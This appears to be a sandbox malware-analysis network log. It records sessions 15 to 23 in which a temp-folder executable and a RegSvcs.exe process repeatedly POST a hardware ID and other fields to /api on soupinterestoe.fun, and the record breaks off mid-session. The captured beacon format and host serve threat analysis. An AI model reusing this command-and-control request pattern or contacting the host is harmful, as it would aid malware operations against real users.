Data Raw: Data Ascii:
Dec 27, 2023 17:57:54.304970026 CET	49	IN	Data Raw: 63 33 31 61 65 66 38 61 66 61 34 36 34 31 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: c31aef8afa4641-DFW15Malformed packet data
Dec 27, 2023 17:57:54.304982901 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49764	104.21.24.252	80	7380	C:\Users\user\AppData\Local\Temp\5A58.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 17:57:54.159049034 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=GRBHCNg2EAZnWl1HpTiwQFq2_duhbL4fOpIhqNZ4fig-1703696269-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 500 Host: soupinterestoe.fun
Dec 27, 2023 17:57:54.159090996 CET	500	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 61 37 39 38 64 31 61 33 30 30 30 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l2a798d1a30000599d130261f60764u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LG
Dec 27, 2023 17:57:54.697700024 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:57:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=qn2euhe1pls1h25cegoh5uokec; expires=Sun, 21-Apr-2024 10:44:33 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:57:54 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:57:54 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:57:54 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=k5k75F2gMy4bO2SIMGRDBM%2FRK7DGA1WiwA1eADFNfjXee5afJ7A7cc1CSUs1zuz8njZB3KQuZWY%2F%2FN508R0DYsiDjFB04tauURXo2mDnQm0PKipEde8vnS9fj97xa3IsZj1SUWA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31af1ee6 Data Raw: Data Ascii:
Dec 27, 2023 17:57:54.697720051 CET	39	IN	Data Raw: 36 63 31 34 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: 6c14-DFW15Malformed packet data
Dec 27, 2023 17:57:54.697731972 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49765	104.21.24.252	80	7544	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 17:57:54.497467041 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=fG.WDRwoO91HZkEjd7zHT7yYUTzjRYTzYsccxZAM2cU-1703696270-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 520 Host: soupinterestoe.fun
Dec 27, 2023 17:57:54.497594118 CET	520	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 37 39 38 44 31 41 33 45 41 41 44 31 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"A798D1A3EAAD13029941599DCB3BA964--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"G
Dec 27, 2023 17:57:55.037683964 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:57:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=seq8l97hbq1fvecvfao2g5t30f; expires=Sun, 21-Apr-2024 10:44:33 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:57:54 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:57:54 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:57:54 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5TpHS1d6ZdoUtO8GBKCBqsZlDgyhir95f8KJKaSWA4iGLIx%2B2iuSm5mVqa3enuF6SbTelmhzuwJZuAWJNrPG1gwa38tz9%2BmaU6eTKkd%2BbeIH%2Fz6Fqe%2Bz5NNu%2FCayYtL9lWF%2FepA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c Data Raw: Data Ascii:
Dec 27, 2023 17:57:55.037698984 CET	47	IN	Data Raw: 31 61 66 34 30 39 39 35 36 62 38 38 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: 1af409956b88-DFW15Malformed packet data
Dec 27, 2023 17:57:55.037709951 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49766	104.21.24.252	80	7380	C:\Users\user\AppData\Local\Temp\5A58.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 17:57:54.924806118 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=GRBHCNg2EAZnWl1HpTiwQFq2_duhbL4fOpIhqNZ4fig-1703696269-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 500 Host: soupinterestoe.fun
Dec 27, 2023 17:57:54.925055981 CET	500	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 61 37 39 38 64 31 61 33 30 30 30 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l2a798d1a30000599d130261f60764u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LG
Dec 27, 2023 17:57:55.451631069 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:57:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=8aqvoitbdh806ibk18prp2v3b3; expires=Sun, 21-Apr-2024 10:44:34 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:57:55 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:57:55 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:57:55 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=kGfr7bHtYwh4aaLwxnazVDDonXrwJHKCAsnQEIwfsZOSTg1n0%2F7wnx4u5dUTSWSbwCDdyQyslkZsl9qCUmA4s04r%2BcXdEjsEps%2FCd6pbkF3%2BnowwkZMnWUmtsIIB0BMCtZJYtOg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31af6a Data Raw: Data Ascii:
Dec 27, 2023 17:57:55.451642036 CET	41	IN	Data Raw: 33 63 37 32 66 35 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: 3c72f5-DFW15Malformed packet data
Dec 27, 2023 17:57:55.451652050 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49767	104.21.24.252	80	7544	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 17:57:55.323668003 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=fG.WDRwoO91HZkEjd7zHT7yYUTzjRYTzYsccxZAM2cU-1703696270-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 520 Host: soupinterestoe.fun
Dec 27, 2023 17:57:55.323703051 CET	520	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 37 39 38 44 31 41 33 45 41 41 44 31 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"A798D1A3EAAD13029941599DCB3BA964--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"G
Dec 27, 2023 17:57:55.736087084 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:57:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=jcfp446bqq2f96q85bn3ojrtno; expires=Sun, 21-Apr-2024 10:44:34 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:57:55 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:57:55 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:57:55 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=UAkBmIESY4oj1whGaP4RI9lVE9RRVkiVinPFoO36Rgf9w%2BTOyKYmGkg1GzswdpN3avT1nVy6%2Fh26W1%2FI2SUHa2fnzkbA825Zp9AjF9rhTyTnyqklC5yZ7DQp9p%2FHm%2FPxuY%2FlOrI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31 Data Raw: Data Ascii:
Dec 27, 2023 17:57:55.736103058 CET	45	IN	Data Raw: 66 39 32 64 36 64 32 63 62 64 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: f92d6d2cbd-DFW15Malformed packet data
Dec 27, 2023 17:57:55.736115932 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49768	104.21.24.252	80	7380	C:\Users\user\AppData\Local\Temp\5A58.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 17:57:55.855083942 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=GRBHCNg2EAZnWl1HpTiwQFq2_duhbL4fOpIhqNZ4fig-1703696269-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 500 Host: soupinterestoe.fun
Dec 27, 2023 17:57:55.855279922 CET	500	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 61 37 39 38 64 31 61 33 30 30 30 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l2a798d1a30000599d130261f60764u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LG
Dec 27, 2023 17:57:56.234844923 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:57:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=np190t74h7dd7u95vk4c5219qd; expires=Sun, 21-Apr-2024 10:44:35 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:57:56 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:57:56 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:57:56 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ZQFTfMqeCNO%2FkMHuMzn%2BBBfHIP6G3s0xXngJLF1lEHoadTcJuR3RIzWFullCV1A%2F%2BNdAvMYYMNW%2FNIIohDomlOPp5PynAlmwAUO7qwUB9%2F90LZudX0nTo4StLauKF1Vxzy82%2F%2BY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8 Data Raw: Data Ascii:
Dec 27, 2023 17:57:56.234859943 CET	49	IN	Data Raw: 63 33 31 61 66 63 37 61 35 30 34 36 63 65 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: c31afc7a5046ce-DFW15Malformed packet data
Dec 27, 2023 17:57:56.234870911 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49769	104.21.24.252	80	7544	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 17:57:56.008153915 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=fG.WDRwoO91HZkEjd7zHT7yYUTzjRYTzYsccxZAM2cU-1703696270-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 520 Host: soupinterestoe.fun
Dec 27, 2023 17:57:56.008213043 CET	520	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 37 39 38 44 31 41 33 45 41 41 44 31 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"A798D1A3EAAD13029941599DCB3BA964--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"G
Dec 27, 2023 17:57:56.396157980 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:57:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=pjmj0nhucacgn6vp20c8pmcdbe; expires=Sun, 21-Apr-2024 10:44:35 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:57:56 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:57:56 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:57:56 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7PRmps4qxS6VGaeAlG7%2FZkUnfb1zpF1Zn8AZh2izrLdFrhrYPs2FAWnU5lGTj2cD%2B5oAYW0I8E3%2BXpA4sKjupLGoMpk77PCK4DdQMc0ZBMgzKVD84ESNdRT4XqwhajC9x5zawBo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31afd7c9 Data Raw: Data Ascii:
Dec 27, 2023 17:57:56.396173000 CET	39	IN	Data Raw: 36 62 61 63 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: 6bac-DFW15Malformed packet data
Dec 27, 2023 17:57:56.396183968 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49770	104.21.24.252	80	7380	C:\Users\user\AppData\Local\Temp\5A58.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 17:57:56.502687931 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=GRBHCNg2EAZnWl1HpTiwQFq2_duhbL4fOpIhqNZ4fig-1703696269-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 500 Host: soupinterestoe.fun
Dec 27, 2023 17:57:56.502999067 CET	500	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 61 37 39 38 64 31 61 33 30 30 30 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l2a798d1a30000599d130261f60764u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LG
Dec 27, 2023 17:57:57.033452988 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:57:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=3ois3uadun5veipaccefvjejfb; expires=Sun, 21-Apr-2024 10:44:35 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:57:56 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:57:56 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:57:56 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=u%2FLBtBvm50y1d582mleGWrcLRR%2FJ1KYUef%2Bu49J1CB9if%2BmtOkVdaeJeeNWXRqFvWqUwuEFSNs1r0p2jB0cPZH6iz2P8Hj4GjaROXbotN8NrG7oCiOu4i0mSqlrdLdFl0So%2BmRI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31b0 Data Raw: Data Ascii:
Dec 27, 2023 17:57:57.033466101 CET	43	IN	Data Raw: 38 61 35 37 65 39 30 39 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: 8a57e909-DFW15Malformed packet data
Dec 27, 2023 17:57:57.033478022 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49772	104.21.24.252	80	7544	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 17:57:56.652354956 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=fG.WDRwoO91HZkEjd7zHT7yYUTzjRYTzYsccxZAM2cU-1703696270-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 520 Host: soupinterestoe.fun
Dec 27, 2023 17:57:56.652411938 CET	520	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 37 39 38 44 31 41 33 45 41 41 44 31 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"A798D1A3EAAD13029941599DCB3BA964--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"G
Dec 27, 2023 17:57:57.037647963 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:57:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=3c9h9is7qnpbgn4giajvohfn9v; expires=Sun, 21-Apr-2024 10:44:35 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:57:56 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:57:56 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:57:56 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=zogAEmJFRQ8rVwDGP38%2BKNhsfQhXChjr3vl2ePFq%2B6ocFyY2EbGu%2BXE6L8zAeNS638wsf1Rrj0B0oN%2FRxzKkknwyT40Z112mAsyeUmTBYtb8vrZkWZ%2FIRJT8qQhwTVBkyTKtyfk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31b0 Data Raw: Data Ascii:
Dec 27, 2023 17:57:57.037659883 CET	43	IN	Data Raw: 37 65 65 62 36 63 34 30 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: 7eeb6c40-DFW15Malformed packet data
Dec 27, 2023 17:57:57.037672043 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49773	104.21.24.252	80	7544	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 17:57:57.305425882 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=fG.WDRwoO91HZkEjd7zHT7yYUTzjRYTzYsccxZAM2cU-1703696270-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 520 Host: soupinterestoe.fun
